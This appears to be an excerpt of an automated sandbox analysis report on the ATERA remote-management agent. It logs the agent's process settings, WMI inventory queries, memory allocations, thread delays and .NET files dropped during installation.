                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Process information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_DiskDrive.DeviceID="\\\\.\\PHYSICALDRIVE0"} where resultclass = Win32_DiskPartition
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Antecedent="Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\""
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PhysicalAdapter,Name,PNPDeviceID from Win32_NetworkAdapter
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSMBios_RawSMBiosTables
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSMBios_RawSMBiosTables
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSMBios_RawSMBiosTables
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select DisplayName,Name,Started,State from Win32_Service where Name='MSExchangeIS' OR DisplayName='MSExchangeIS'
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Name,DisplayName,Description,State from Win32_Service
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select DisplayName,Name,Started,State from Win32_Service where Name='MSExchangeIS' OR DisplayName='MSExchangeIS'
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select DisplayName,Name,Started,State from Win32_Service where Name='MSExchangeIS' OR DisplayName='MSExchangeIS'
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID="Disk #0, Partition #0"} where resultclass = Win32_LogicalDisk
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #0\""
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_LogicalDisk
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID="Disk #0, Partition #2"} where resultclass = Win32_LogicalDisk
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #2\""
                                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size,FreeSpace,Name FROM Win32_LogicalDisk where DriveType=3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #0"} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #0\""
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #2"} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #2\""
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size,FreeSpace,Name FROM Win32_LogicalDisk where DriveType=3
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID="Disk #0, Partition #0"} where resultclass = Win32_LogicalDisk
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #0\""
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_LogicalDisk
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID="Disk #0, Partition #2"} where resultclass = Win32_LogicalDisk
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #2\""
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size,FreeSpace,Name FROM Win32_LogicalDisk where DriveType=3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID="Disk #0, Partition #0"} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #0\""
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID="Disk #0, Partition #2"} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #2\""
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size,FreeSpace,Name FROM Win32_LogicalDisk where DriveType=3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Name from Win32_SoundDevice
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 1E7269C0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 1E7404A0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 23476CE0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 23476D70000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 1FD412A0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 1FD59970000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 26AD1BD0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 26AEA3B0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 1A113D40000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 1A12C540000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 1A881280000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 1A899950000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 246BB020000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 246D3670000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeMemory allocated: 27055320000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeMemory allocated: 2706D8E0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMemory allocated: 22AC0380000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMemory allocated: 22AD89F0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 1E433510000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 1E44BA70000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeMemory allocated: 10B6EC70000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeMemory allocated: 10B6EDE0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeMemory allocated: 2E7234C0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeThread delayed: delay time: 598572
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.Brotli.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Web.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.VisualBasic.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 4c999b.rbf (copy)Jump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Http.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Overlapped.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.Expressions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentCommunication.Models.dllJump to dropped file
